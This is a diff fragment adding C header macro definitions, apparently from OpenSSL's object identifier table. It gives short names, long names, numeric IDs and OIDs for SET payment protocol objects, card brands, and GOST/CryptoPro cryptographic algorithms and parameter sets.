+#define SN_set_ctype		"set-ctype"
+#define LN_set_ctype		"content types"
+#define NID_set_ctype		513
+#define OBJ_set_ctype		OBJ_id_set,0L
+
+#define SN_set_msgExt		"set-msgExt"
+#define LN_set_msgExt		"message extensions"
+#define NID_set_msgExt		514
+#define OBJ_set_msgExt		OBJ_id_set,1L
+
+#define SN_set_attr		"set-attr"
+#define NID_set_attr		515
+#define OBJ_set_attr		OBJ_id_set,3L
+
+#define SN_set_policy		"set-policy"
+#define NID_set_policy		516
+#define OBJ_set_policy		OBJ_id_set,5L
+
+#define SN_set_certExt		"set-certExt"
+#define LN_set_certExt		"certificate extensions"
+#define NID_set_certExt		517
+#define OBJ_set_certExt		OBJ_id_set,7L
+
+#define SN_set_brand		"set-brand"
+#define NID_set_brand		518
+#define OBJ_set_brand		OBJ_id_set,8L
+
+#define SN_setct_PANData		"setct-PANData"
+#define NID_setct_PANData		519
+#define OBJ_setct_PANData		OBJ_set_ctype,0L
+
+#define SN_setct_PANToken		"setct-PANToken"
+#define NID_setct_PANToken		520
+#define OBJ_setct_PANToken		OBJ_set_ctype,1L
+
+#define SN_setct_PANOnly		"setct-PANOnly"
+#define NID_setct_PANOnly		521
+#define OBJ_setct_PANOnly		OBJ_set_ctype,2L
+
+#define SN_setct_OIData		"setct-OIData"
+#define NID_setct_OIData		522
+#define OBJ_setct_OIData		OBJ_set_ctype,3L
+
+#define SN_setct_PI		"setct-PI"
+#define NID_setct_PI		523
+#define OBJ_setct_PI		OBJ_set_ctype,4L
+
+#define SN_setct_PIData		"setct-PIData"
+#define NID_setct_PIData		524
+#define OBJ_setct_PIData		OBJ_set_ctype,5L
+
+#define SN_setct_PIDataUnsigned		"setct-PIDataUnsigned"
+#define NID_setct_PIDataUnsigned		525
+#define OBJ_setct_PIDataUnsigned		OBJ_set_ctype,6L
+
+#define SN_setct_HODInput		"setct-HODInput"
+#define NID_setct_HODInput		526
+#define OBJ_setct_HODInput		OBJ_set_ctype,7L
+
+#define SN_setct_AuthResBaggage		"setct-AuthResBaggage"
+#define NID_setct_AuthResBaggage		527
+#define OBJ_setct_AuthResBaggage		OBJ_set_ctype,8L
+
+#define SN_setct_AuthRevReqBaggage		"setct-AuthRevReqBaggage"
+#define NID_setct_AuthRevReqBaggage		528
+#define OBJ_setct_AuthRevReqBaggage		OBJ_set_ctype,9L
+
+#define SN_setct_AuthRevResBaggage		"setct-AuthRevResBaggage"
+#define NID_setct_AuthRevResBaggage		529
+#define OBJ_setct_AuthRevResBaggage		OBJ_set_ctype,10L
+
+#define SN_setct_CapTokenSeq		"setct-CapTokenSeq"
+#define NID_setct_CapTokenSeq		530
+#define OBJ_setct_CapTokenSeq		OBJ_set_ctype,11L
+
+#define SN_setct_PInitResData		"setct-PInitResData"
+#define NID_setct_PInitResData		531
+#define OBJ_setct_PInitResData		OBJ_set_ctype,12L
+
+#define SN_setct_PI_TBS		"setct-PI-TBS"
+#define NID_setct_PI_TBS		532
+#define OBJ_setct_PI_TBS		OBJ_set_ctype,13L
+
+#define SN_setct_PResData		"setct-PResData"
+#define NID_setct_PResData		533
+#define OBJ_setct_PResData		OBJ_set_ctype,14L
+
+#define SN_setct_AuthReqTBS		"setct-AuthReqTBS"
+#define NID_setct_AuthReqTBS		534
+#define OBJ_setct_AuthReqTBS		OBJ_set_ctype,16L
+
+#define SN_setct_AuthResTBS		"setct-AuthResTBS"
+#define NID_setct_AuthResTBS		535
+#define OBJ_setct_AuthResTBS		OBJ_set_ctype,17L
+
+#define SN_setct_AuthResTBSX		"setct-AuthResTBSX"
+#define NID_setct_AuthResTBSX		536
+#define OBJ_setct_AuthResTBSX		OBJ_set_ctype,18L
+
+#define SN_setct_AuthTokenTBS		"setct-AuthTokenTBS"
+#define NID_setct_AuthTokenTBS		537
+#define OBJ_setct_AuthTokenTBS		OBJ_set_ctype,19L
+
+#define SN_setct_CapTokenData		"setct-CapTokenData"
+#define NID_setct_CapTokenData		538
+#define OBJ_setct_CapTokenData		OBJ_set_ctype,20L
+
+#define SN_setct_CapTokenTBS		"setct-CapTokenTBS"
+#define NID_setct_CapTokenTBS		539
+#define OBJ_setct_CapTokenTBS		OBJ_set_ctype,21L
+
+#define SN_setct_AcqCardCodeMsg		"setct-AcqCardCodeMsg"
+#define NID_setct_AcqCardCodeMsg		540
+#define OBJ_setct_AcqCardCodeMsg		OBJ_set_ctype,22L
+
+#define SN_setct_AuthRevReqTBS		"setct-AuthRevReqTBS"
+#define NID_setct_AuthRevReqTBS		541
+#define OBJ_setct_AuthRevReqTBS		OBJ_set_ctype,23L
+
+#define SN_setct_AuthRevResData		"setct-AuthRevResData"
+#define NID_setct_AuthRevResData		542
+#define OBJ_setct_AuthRevResData		OBJ_set_ctype,24L
+
+#define SN_setct_AuthRevResTBS		"setct-AuthRevResTBS"
+#define NID_setct_AuthRevResTBS		543
+#define OBJ_setct_AuthRevResTBS		OBJ_set_ctype,25L
+
+#define SN_setct_CapReqTBS		"setct-CapReqTBS"
+#define NID_setct_CapReqTBS		544
+#define OBJ_setct_CapReqTBS		OBJ_set_ctype,26L
+
+#define SN_setct_CapReqTBSX		"setct-CapReqTBSX"
+#define NID_setct_CapReqTBSX		545
+#define OBJ_setct_CapReqTBSX		OBJ_set_ctype,27L
+
+#define SN_setct_CapResData		"setct-CapResData"
+#define NID_setct_CapResData		546
+#define OBJ_setct_CapResData		OBJ_set_ctype,28L
+
+#define SN_setct_CapRevReqTBS		"setct-CapRevReqTBS"
+#define NID_setct_CapRevReqTBS		547
+#define OBJ_setct_CapRevReqTBS		OBJ_set_ctype,29L
+
+#define SN_setct_CapRevReqTBSX		"setct-CapRevReqTBSX"
+#define NID_setct_CapRevReqTBSX		548
+#define OBJ_setct_CapRevReqTBSX		OBJ_set_ctype,30L
+
+#define SN_setct_CapRevResData		"setct-CapRevResData"
+#define NID_setct_CapRevResData		549
+#define OBJ_setct_CapRevResData		OBJ_set_ctype,31L
+
+#define SN_setct_CredReqTBS		"setct-CredReqTBS"
+#define NID_setct_CredReqTBS		550
+#define OBJ_setct_CredReqTBS		OBJ_set_ctype,32L
+
+#define SN_setct_CredReqTBSX		"setct-CredReqTBSX"
+#define NID_setct_CredReqTBSX		551
+#define OBJ_setct_CredReqTBSX		OBJ_set_ctype,33L
+
+#define SN_setct_CredResData		"setct-CredResData"
+#define NID_setct_CredResData		552
+#define OBJ_setct_CredResData		OBJ_set_ctype,34L
+
+#define SN_setct_CredRevReqTBS		"setct-CredRevReqTBS"
+#define NID_setct_CredRevReqTBS		553
+#define OBJ_setct_CredRevReqTBS		OBJ_set_ctype,35L
+
+#define SN_setct_CredRevReqTBSX		"setct-CredRevReqTBSX"
+#define NID_setct_CredRevReqTBSX		554
+#define OBJ_setct_CredRevReqTBSX		OBJ_set_ctype,36L
+
+#define SN_setct_CredRevResData		"setct-CredRevResData"
+#define NID_setct_CredRevResData		555
+#define OBJ_setct_CredRevResData		OBJ_set_ctype,37L
+
+#define SN_setct_PCertReqData		"setct-PCertReqData"
+#define NID_setct_PCertReqData		556
+#define OBJ_setct_PCertReqData		OBJ_set_ctype,38L
+
+#define SN_setct_PCertResTBS		"setct-PCertResTBS"
+#define NID_setct_PCertResTBS		557
+#define OBJ_setct_PCertResTBS		OBJ_set_ctype,39L
+
+#define SN_setct_BatchAdminReqData		"setct-BatchAdminReqData"
+#define NID_setct_BatchAdminReqData		558
+#define OBJ_setct_BatchAdminReqData		OBJ_set_ctype,40L
+
+#define SN_setct_BatchAdminResData		"setct-BatchAdminResData"
+#define NID_setct_BatchAdminResData		559
+#define OBJ_setct_BatchAdminResData		OBJ_set_ctype,41L
+
+#define SN_setct_CardCInitResTBS		"setct-CardCInitResTBS"
+#define NID_setct_CardCInitResTBS		560
+#define OBJ_setct_CardCInitResTBS		OBJ_set_ctype,42L
+
+#define SN_setct_MeAqCInitResTBS		"setct-MeAqCInitResTBS"
+#define NID_setct_MeAqCInitResTBS		561
+#define OBJ_setct_MeAqCInitResTBS		OBJ_set_ctype,43L
+
+#define SN_setct_RegFormResTBS		"setct-RegFormResTBS"
+#define NID_setct_RegFormResTBS		562
+#define OBJ_setct_RegFormResTBS		OBJ_set_ctype,44L
+
+#define SN_setct_CertReqData		"setct-CertReqData"
+#define NID_setct_CertReqData		563
+#define OBJ_setct_CertReqData		OBJ_set_ctype,45L
+
+#define SN_setct_CertReqTBS		"setct-CertReqTBS"
+#define NID_setct_CertReqTBS		564
+#define OBJ_setct_CertReqTBS		OBJ_set_ctype,46L
+
+#define SN_setct_CertResData		"setct-CertResData"
+#define NID_setct_CertResData		565
+#define OBJ_setct_CertResData		OBJ_set_ctype,47L
+
+#define SN_setct_CertInqReqTBS		"setct-CertInqReqTBS"
+#define NID_setct_CertInqReqTBS		566
+#define OBJ_setct_CertInqReqTBS		OBJ_set_ctype,48L
+
+#define SN_setct_ErrorTBS		"setct-ErrorTBS"
+#define NID_setct_ErrorTBS		567
+#define OBJ_setct_ErrorTBS		OBJ_set_ctype,49L
+
+#define SN_setct_PIDualSignedTBE		"setct-PIDualSignedTBE"
+#define NID_setct_PIDualSignedTBE		568
+#define OBJ_setct_PIDualSignedTBE		OBJ_set_ctype,50L
+
+#define SN_setct_PIUnsignedTBE		"setct-PIUnsignedTBE"
+#define NID_setct_PIUnsignedTBE		569
+#define OBJ_setct_PIUnsignedTBE		OBJ_set_ctype,51L
+
+#define SN_setct_AuthReqTBE		"setct-AuthReqTBE"
+#define NID_setct_AuthReqTBE		570
+#define OBJ_setct_AuthReqTBE		OBJ_set_ctype,52L
+
+#define SN_setct_AuthResTBE		"setct-AuthResTBE"
+#define NID_setct_AuthResTBE		571
+#define OBJ_setct_AuthResTBE		OBJ_set_ctype,53L
+
+#define SN_setct_AuthResTBEX		"setct-AuthResTBEX"
+#define NID_setct_AuthResTBEX		572
+#define OBJ_setct_AuthResTBEX		OBJ_set_ctype,54L
+
+#define SN_setct_AuthTokenTBE		"setct-AuthTokenTBE"
+#define NID_setct_AuthTokenTBE		573
+#define OBJ_setct_AuthTokenTBE		OBJ_set_ctype,55L
+
+#define SN_setct_CapTokenTBE		"setct-CapTokenTBE"
+#define NID_setct_CapTokenTBE		574
+#define OBJ_setct_CapTokenTBE		OBJ_set_ctype,56L
+
+#define SN_setct_CapTokenTBEX		"setct-CapTokenTBEX"
+#define NID_setct_CapTokenTBEX		575
+#define OBJ_setct_CapTokenTBEX		OBJ_set_ctype,57L
+
+#define SN_setct_AcqCardCodeMsgTBE		"setct-AcqCardCodeMsgTBE"
+#define NID_setct_AcqCardCodeMsgTBE		576
+#define OBJ_setct_AcqCardCodeMsgTBE		OBJ_set_ctype,58L
+
+#define SN_setct_AuthRevReqTBE		"setct-AuthRevReqTBE"
+#define NID_setct_AuthRevReqTBE		577
+#define OBJ_setct_AuthRevReqTBE		OBJ_set_ctype,59L
+
+#define SN_setct_AuthRevResTBE		"setct-AuthRevResTBE"
+#define NID_setct_AuthRevResTBE		578
+#define OBJ_setct_AuthRevResTBE		OBJ_set_ctype,60L
+
+#define SN_setct_AuthRevResTBEB		"setct-AuthRevResTBEB"
+#define NID_setct_AuthRevResTBEB		579
+#define OBJ_setct_AuthRevResTBEB		OBJ_set_ctype,61L
+
+#define SN_setct_CapReqTBE		"setct-CapReqTBE"
+#define NID_setct_CapReqTBE		580
+#define OBJ_setct_CapReqTBE		OBJ_set_ctype,62L
+
+#define SN_setct_CapReqTBEX		"setct-CapReqTBEX"
+#define NID_setct_CapReqTBEX		581
+#define OBJ_setct_CapReqTBEX		OBJ_set_ctype,63L
+
+#define SN_setct_CapResTBE		"setct-CapResTBE"
+#define NID_setct_CapResTBE		582
+#define OBJ_setct_CapResTBE		OBJ_set_ctype,64L
+
+#define SN_setct_CapRevReqTBE		"setct-CapRevReqTBE"
+#define NID_setct_CapRevReqTBE		583
+#define OBJ_setct_CapRevReqTBE		OBJ_set_ctype,65L
+
+#define SN_setct_CapRevReqTBEX		"setct-CapRevReqTBEX"
+#define NID_setct_CapRevReqTBEX		584
+#define OBJ_setct_CapRevReqTBEX		OBJ_set_ctype,66L
+
+#define SN_setct_CapRevResTBE		"setct-CapRevResTBE"
+#define NID_setct_CapRevResTBE		585
+#define OBJ_setct_CapRevResTBE		OBJ_set_ctype,67L
+
+#define SN_setct_CredReqTBE		"setct-CredReqTBE"
+#define NID_setct_CredReqTBE		586
+#define OBJ_setct_CredReqTBE		OBJ_set_ctype,68L
+
+#define SN_setct_CredReqTBEX		"setct-CredReqTBEX"
+#define NID_setct_CredReqTBEX		587
+#define OBJ_setct_CredReqTBEX		OBJ_set_ctype,69L
+
+#define SN_setct_CredResTBE		"setct-CredResTBE"
+#define NID_setct_CredResTBE		588
+#define OBJ_setct_CredResTBE		OBJ_set_ctype,70L
+
+#define SN_setct_CredRevReqTBE		"setct-CredRevReqTBE"
+#define NID_setct_CredRevReqTBE		589
+#define OBJ_setct_CredRevReqTBE		OBJ_set_ctype,71L
+
+#define SN_setct_CredRevReqTBEX		"setct-CredRevReqTBEX"
+#define NID_setct_CredRevReqTBEX		590
+#define OBJ_setct_CredRevReqTBEX		OBJ_set_ctype,72L
+
+#define SN_setct_CredRevResTBE		"setct-CredRevResTBE"
+#define NID_setct_CredRevResTBE		591
+#define OBJ_setct_CredRevResTBE		OBJ_set_ctype,73L
+
+#define SN_setct_BatchAdminReqTBE		"setct-BatchAdminReqTBE"
+#define NID_setct_BatchAdminReqTBE		592
+#define OBJ_setct_BatchAdminReqTBE		OBJ_set_ctype,74L
+
+#define SN_setct_BatchAdminResTBE		"setct-BatchAdminResTBE"
+#define NID_setct_BatchAdminResTBE		593
+#define OBJ_setct_BatchAdminResTBE		OBJ_set_ctype,75L
+
+#define SN_setct_RegFormReqTBE		"setct-RegFormReqTBE"
+#define NID_setct_RegFormReqTBE		594
+#define OBJ_setct_RegFormReqTBE		OBJ_set_ctype,76L
+
+#define SN_setct_CertReqTBE		"setct-CertReqTBE"
+#define NID_setct_CertReqTBE		595
+#define OBJ_setct_CertReqTBE		OBJ_set_ctype,77L
+
+#define SN_setct_CertReqTBEX		"setct-CertReqTBEX"
+#define NID_setct_CertReqTBEX		596
+#define OBJ_setct_CertReqTBEX		OBJ_set_ctype,78L
+
+#define SN_setct_CertResTBE		"setct-CertResTBE"
+#define NID_setct_CertResTBE		597
+#define OBJ_setct_CertResTBE		OBJ_set_ctype,79L
+
+#define SN_setct_CRLNotificationTBS		"setct-CRLNotificationTBS"
+#define NID_setct_CRLNotificationTBS		598
+#define OBJ_setct_CRLNotificationTBS		OBJ_set_ctype,80L
+
+#define SN_setct_CRLNotificationResTBS		"setct-CRLNotificationResTBS"
+#define NID_setct_CRLNotificationResTBS		599
+#define OBJ_setct_CRLNotificationResTBS		OBJ_set_ctype,81L
+
+#define SN_setct_BCIDistributionTBS		"setct-BCIDistributionTBS"
+#define NID_setct_BCIDistributionTBS		600
+#define OBJ_setct_BCIDistributionTBS		OBJ_set_ctype,82L
+
+#define SN_setext_genCrypt		"setext-genCrypt"
+#define LN_setext_genCrypt		"generic cryptogram"
+#define NID_setext_genCrypt		601
+#define OBJ_setext_genCrypt		OBJ_set_msgExt,1L
+
+#define SN_setext_miAuth		"setext-miAuth"
+#define LN_setext_miAuth		"merchant initiated auth"
+#define NID_setext_miAuth		602
+#define OBJ_setext_miAuth		OBJ_set_msgExt,3L
+
+#define SN_setext_pinSecure		"setext-pinSecure"
+#define NID_setext_pinSecure		603
+#define OBJ_setext_pinSecure		OBJ_set_msgExt,4L
+
+#define SN_setext_pinAny		"setext-pinAny"
+#define NID_setext_pinAny		604
+#define OBJ_setext_pinAny		OBJ_set_msgExt,5L
+
+#define SN_setext_track2		"setext-track2"
+#define NID_setext_track2		605
+#define OBJ_setext_track2		OBJ_set_msgExt,7L
+
+#define SN_setext_cv		"setext-cv"
+#define LN_setext_cv		"additional verification"
+#define NID_setext_cv		606
+#define OBJ_setext_cv		OBJ_set_msgExt,8L
+
+#define SN_set_policy_root		"set-policy-root"
+#define NID_set_policy_root		607
+#define OBJ_set_policy_root		OBJ_set_policy,0L
+
+#define SN_setCext_hashedRoot		"setCext-hashedRoot"
+#define NID_setCext_hashedRoot		608
+#define OBJ_setCext_hashedRoot		OBJ_set_certExt,0L
+
+#define SN_setCext_certType		"setCext-certType"
+#define NID_setCext_certType		609
+#define OBJ_setCext_certType		OBJ_set_certExt,1L
+
+#define SN_setCext_merchData		"setCext-merchData"
+#define NID_setCext_merchData		610
+#define OBJ_setCext_merchData		OBJ_set_certExt,2L
+
+#define SN_setCext_cCertRequired		"setCext-cCertRequired"
+#define NID_setCext_cCertRequired		611
+#define OBJ_setCext_cCertRequired		OBJ_set_certExt,3L
+
+#define SN_setCext_tunneling		"setCext-tunneling"
+#define NID_setCext_tunneling		612
+#define OBJ_setCext_tunneling		OBJ_set_certExt,4L
+
+#define SN_setCext_setExt		"setCext-setExt"
+#define NID_setCext_setExt		613
+#define OBJ_setCext_setExt		OBJ_set_certExt,5L
+
+#define SN_setCext_setQualf		"setCext-setQualf"
+#define NID_setCext_setQualf		614
+#define OBJ_setCext_setQualf		OBJ_set_certExt,6L
+
+#define SN_setCext_PGWYcapabilities		"setCext-PGWYcapabilities"
+#define NID_setCext_PGWYcapabilities		615
+#define OBJ_setCext_PGWYcapabilities		OBJ_set_certExt,7L
+
+#define SN_setCext_TokenIdentifier		"setCext-TokenIdentifier"
+#define NID_setCext_TokenIdentifier		616
+#define OBJ_setCext_TokenIdentifier		OBJ_set_certExt,8L
+
+#define SN_setCext_Track2Data		"setCext-Track2Data"
+#define NID_setCext_Track2Data		617
+#define OBJ_setCext_Track2Data		OBJ_set_certExt,9L
+
+#define SN_setCext_TokenType		"setCext-TokenType"
+#define NID_setCext_TokenType		618
+#define OBJ_setCext_TokenType		OBJ_set_certExt,10L
+
+#define SN_setCext_IssuerCapabilities		"setCext-IssuerCapabilities"
+#define NID_setCext_IssuerCapabilities		619
+#define OBJ_setCext_IssuerCapabilities		OBJ_set_certExt,11L
+
+#define SN_setAttr_Cert		"setAttr-Cert"
+#define NID_setAttr_Cert		620
+#define OBJ_setAttr_Cert		OBJ_set_attr,0L
+
+#define SN_setAttr_PGWYcap		"setAttr-PGWYcap"
+#define LN_setAttr_PGWYcap		"payment gateway capabilities"
+#define NID_setAttr_PGWYcap		621
+#define OBJ_setAttr_PGWYcap		OBJ_set_attr,1L
+
+#define SN_setAttr_TokenType		"setAttr-TokenType"
+#define NID_setAttr_TokenType		622
+#define OBJ_setAttr_TokenType		OBJ_set_attr,2L
+
+#define SN_setAttr_IssCap		"setAttr-IssCap"
+#define LN_setAttr_IssCap		"issuer capabilities"
+#define NID_setAttr_IssCap		623
+#define OBJ_setAttr_IssCap		OBJ_set_attr,3L
+
+#define SN_set_rootKeyThumb		"set-rootKeyThumb"
+#define NID_set_rootKeyThumb		624
+#define OBJ_set_rootKeyThumb		OBJ_setAttr_Cert,0L
+
+#define SN_set_addPolicy		"set-addPolicy"
+#define NID_set_addPolicy		625
+#define OBJ_set_addPolicy		OBJ_setAttr_Cert,1L
+
+#define SN_setAttr_Token_EMV		"setAttr-Token-EMV"
+#define NID_setAttr_Token_EMV		626
+#define OBJ_setAttr_Token_EMV		OBJ_setAttr_TokenType,1L
+
+#define SN_setAttr_Token_B0Prime		"setAttr-Token-B0Prime"
+#define NID_setAttr_Token_B0Prime		627
+#define OBJ_setAttr_Token_B0Prime		OBJ_setAttr_TokenType,2L
+
+#define SN_setAttr_IssCap_CVM		"setAttr-IssCap-CVM"
+#define NID_setAttr_IssCap_CVM		628
+#define OBJ_setAttr_IssCap_CVM		OBJ_setAttr_IssCap,3L
+
+#define SN_setAttr_IssCap_T2		"setAttr-IssCap-T2"
+#define NID_setAttr_IssCap_T2		629
+#define OBJ_setAttr_IssCap_T2		OBJ_setAttr_IssCap,4L
+
+#define SN_setAttr_IssCap_Sig		"setAttr-IssCap-Sig"
+#define NID_setAttr_IssCap_Sig		630
+#define OBJ_setAttr_IssCap_Sig		OBJ_setAttr_IssCap,5L
+
+#define SN_setAttr_GenCryptgrm		"setAttr-GenCryptgrm"
+#define LN_setAttr_GenCryptgrm		"generate cryptogram"
+#define NID_setAttr_GenCryptgrm		631
+#define OBJ_setAttr_GenCryptgrm		OBJ_setAttr_IssCap_CVM,1L
+
+#define SN_setAttr_T2Enc		"setAttr-T2Enc"
+#define LN_setAttr_T2Enc		"encrypted track 2"
+#define NID_setAttr_T2Enc		632
+#define OBJ_setAttr_T2Enc		OBJ_setAttr_IssCap_T2,1L
+
+#define SN_setAttr_T2cleartxt		"setAttr-T2cleartxt"
+#define LN_setAttr_T2cleartxt		"cleartext track 2"
+#define NID_setAttr_T2cleartxt		633
+#define OBJ_setAttr_T2cleartxt		OBJ_setAttr_IssCap_T2,2L
+
+#define SN_setAttr_TokICCsig		"setAttr-TokICCsig"
+#define LN_setAttr_TokICCsig		"ICC or token signature"
+#define NID_setAttr_TokICCsig		634
+#define OBJ_setAttr_TokICCsig		OBJ_setAttr_IssCap_Sig,1L
+
+#define SN_setAttr_SecDevSig		"setAttr-SecDevSig"
+#define LN_setAttr_SecDevSig		"secure device signature"
+#define NID_setAttr_SecDevSig		635
+#define OBJ_setAttr_SecDevSig		OBJ_setAttr_IssCap_Sig,2L
+
+#define SN_set_brand_IATA_ATA		"set-brand-IATA-ATA"
+#define NID_set_brand_IATA_ATA		636
+#define OBJ_set_brand_IATA_ATA		OBJ_set_brand,1L
+
+#define SN_set_brand_Diners		"set-brand-Diners"
+#define NID_set_brand_Diners		637
+#define OBJ_set_brand_Diners		OBJ_set_brand,30L
+
+#define SN_set_brand_AmericanExpress		"set-brand-AmericanExpress"
+#define NID_set_brand_AmericanExpress		638
+#define OBJ_set_brand_AmericanExpress		OBJ_set_brand,34L
+
+#define SN_set_brand_JCB		"set-brand-JCB"
+#define NID_set_brand_JCB		639
+#define OBJ_set_brand_JCB		OBJ_set_brand,35L
+
+#define SN_set_brand_Visa		"set-brand-Visa"
+#define NID_set_brand_Visa		640
+#define OBJ_set_brand_Visa		OBJ_set_brand,4L
+
+#define SN_set_brand_MasterCard		"set-brand-MasterCard"
+#define NID_set_brand_MasterCard		641
+#define OBJ_set_brand_MasterCard		OBJ_set_brand,5L
+
+#define SN_set_brand_Novus		"set-brand-Novus"
+#define NID_set_brand_Novus		642
+#define OBJ_set_brand_Novus		OBJ_set_brand,6011L
+
+#define SN_des_cdmf		"DES-CDMF"
+#define LN_des_cdmf		"des-cdmf"
+#define NID_des_cdmf		643
+#define OBJ_des_cdmf		OBJ_rsadsi,3L,10L
+
+#define SN_rsaOAEPEncryptionSET		"rsaOAEPEncryptionSET"
+#define NID_rsaOAEPEncryptionSET		644
+#define OBJ_rsaOAEPEncryptionSET		OBJ_rsadsi,1L,1L,6L
+
+#define SN_ipsec3		"Oakley-EC2N-3"
+#define LN_ipsec3		"ipsec3"
+#define NID_ipsec3		749
+
+#define SN_ipsec4		"Oakley-EC2N-4"
+#define LN_ipsec4		"ipsec4"
+#define NID_ipsec4		750
+
+#define SN_whirlpool		"whirlpool"
+#define NID_whirlpool		804
+#define OBJ_whirlpool		OBJ_iso,0L,10118L,3L,0L,55L
+
+#define SN_cryptopro		"cryptopro"
+#define NID_cryptopro		805
+#define OBJ_cryptopro		OBJ_member_body,643L,2L,2L
+
+#define SN_cryptocom		"cryptocom"
+#define NID_cryptocom		806
+#define OBJ_cryptocom		OBJ_member_body,643L,2L,9L
+
+#define SN_id_GostR3411_94_with_GostR3410_2001		"id-GostR3411-94-with-GostR3410-2001"
+#define LN_id_GostR3411_94_with_GostR3410_2001		"GOST R 34.11-94 with GOST R 34.10-2001"
+#define NID_id_GostR3411_94_with_GostR3410_2001		807
+#define OBJ_id_GostR3411_94_with_GostR3410_2001		OBJ_cryptopro,3L
+
+#define SN_id_GostR3411_94_with_GostR3410_94		"id-GostR3411-94-with-GostR3410-94"
+#define LN_id_GostR3411_94_with_GostR3410_94		"GOST R 34.11-94 with GOST R 34.10-94"
+#define NID_id_GostR3411_94_with_GostR3410_94		808
+#define OBJ_id_GostR3411_94_with_GostR3410_94		OBJ_cryptopro,4L
+
+#define SN_id_GostR3411_94		"md_gost94"
+#define LN_id_GostR3411_94		"GOST R 34.11-94"
+#define NID_id_GostR3411_94		809
+#define OBJ_id_GostR3411_94		OBJ_cryptopro,9L
+
+#define SN_id_HMACGostR3411_94		"id-HMACGostR3411-94"
+#define LN_id_HMACGostR3411_94		"HMAC GOST 34.11-94"
+#define NID_id_HMACGostR3411_94		810
+#define OBJ_id_HMACGostR3411_94		OBJ_cryptopro,10L
+
+#define SN_id_GostR3410_2001		"gost2001"
+#define LN_id_GostR3410_2001		"GOST R 34.10-2001"
+#define NID_id_GostR3410_2001		811
+#define OBJ_id_GostR3410_2001		OBJ_cryptopro,19L
+
+#define SN_id_GostR3410_94		"gost94"
+#define LN_id_GostR3410_94		"GOST R 34.10-94"
+#define NID_id_GostR3410_94		812
+#define OBJ_id_GostR3410_94		OBJ_cryptopro,20L
+
+#define SN_id_Gost28147_89		"gost89"
+#define LN_id_Gost28147_89		"GOST 28147-89"
+#define NID_id_Gost28147_89		813
+#define OBJ_id_Gost28147_89		OBJ_cryptopro,21L
+
+#define SN_gost89_cnt		"gost89-cnt"
+#define NID_gost89_cnt		814
+
+#define SN_id_Gost28147_89_MAC		"gost-mac"
+#define LN_id_Gost28147_89_MAC		"GOST 28147-89 MAC"
+#define NID_id_Gost28147_89_MAC		815
+#define OBJ_id_Gost28147_89_MAC		OBJ_cryptopro,22L
+
+#define SN_id_GostR3411_94_prf		"prf-gostr3411-94"
+#define LN_id_GostR3411_94_prf		"GOST R 34.11-94 PRF"
+#define NID_id_GostR3411_94_prf		816
+#define OBJ_id_GostR3411_94_prf		OBJ_cryptopro,23L
+
+#define SN_id_GostR3410_2001DH		"id-GostR3410-2001DH"
+#define LN_id_GostR3410_2001DH		"GOST R 34.10-2001 DH"
+#define NID_id_GostR3410_2001DH		817
+#define OBJ_id_GostR3410_2001DH		OBJ_cryptopro,98L
+
+#define SN_id_GostR3410_94DH		"id-GostR3410-94DH"
+#define LN_id_GostR3410_94DH		"GOST R 34.10-94 DH"
+#define NID_id_GostR3410_94DH		818
+#define OBJ_id_GostR3410_94DH		OBJ_cryptopro,99L
+
+#define SN_id_Gost28147_89_CryptoPro_KeyMeshing		"id-Gost28147-89-CryptoPro-KeyMeshing"
+#define NID_id_Gost28147_89_CryptoPro_KeyMeshing		819
+#define OBJ_id_Gost28147_89_CryptoPro_KeyMeshing		OBJ_cryptopro,14L,1L
+
+#define SN_id_Gost28147_89_None_KeyMeshing		"id-Gost28147-89-None-KeyMeshing"
+#define NID_id_Gost28147_89_None_KeyMeshing		820
+#define OBJ_id_Gost28147_89_None_KeyMeshing		OBJ_cryptopro,14L,0L
+
+#define SN_id_GostR3411_94_TestParamSet		"id-GostR3411-94-TestParamSet"
+#define NID_id_GostR3411_94_TestParamSet		821
+#define OBJ_id_GostR3411_94_TestParamSet		OBJ_cryptopro,30L,0L
+
+#define SN_id_GostR3411_94_CryptoProParamSet		"id-GostR3411-94-CryptoProParamSet"
+#define NID_id_GostR3411_94_CryptoProParamSet		822
+#define OBJ_id_GostR3411_94_CryptoProParamSet		OBJ_cryptopro,30L,1L
+
+#define SN_id_Gost28147_89_TestParamSet		"id-Gost28147-89-TestParamSet"
+#define NID_id_Gost28147_89_TestParamSet		823
+#define OBJ_id_Gost28147_89_TestParamSet		OBJ_cryptopro,31L,0L
+
+#define SN_id_Gost28147_89_CryptoPro_A_ParamSet		"id-Gost28147-89-CryptoPro-A-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_A_ParamSet		824
+#define OBJ_id_Gost28147_89_CryptoPro_A_ParamSet		OBJ_cryptopro,31L,1L
+
+#define SN_id_Gost28147_89_CryptoPro_B_ParamSet		"id-Gost28147-89-CryptoPro-B-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_B_ParamSet		825
+#define OBJ_id_Gost28147_89_CryptoPro_B_ParamSet		OBJ_cryptopro,31L,2L
+
+#define SN_id_Gost28147_89_CryptoPro_C_ParamSet		"id-Gost28147-89-CryptoPro-C-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_C_ParamSet		826
+#define OBJ_id_Gost28147_89_CryptoPro_C_ParamSet		OBJ_cryptopro,31L,3L
+
+#define SN_id_Gost28147_89_CryptoPro_D_ParamSet		"id-Gost28147-89-CryptoPro-D-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_D_ParamSet		827
+#define OBJ_id_Gost28147_89_CryptoPro_D_ParamSet		OBJ_cryptopro,31L,4L
+
+#define SN_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		"id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		828
+#define OBJ_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		OBJ_cryptopro,31L,5L
+
+#define SN_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		"id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		829
+#define OBJ_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		OBJ_cryptopro,31L,6L
+
+#define SN_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		"id-Gost28147-89-CryptoPro-RIC-1-ParamSet"
+#define NID_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		830
+#define OBJ_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		OBJ_cryptopro,31L,7L
+
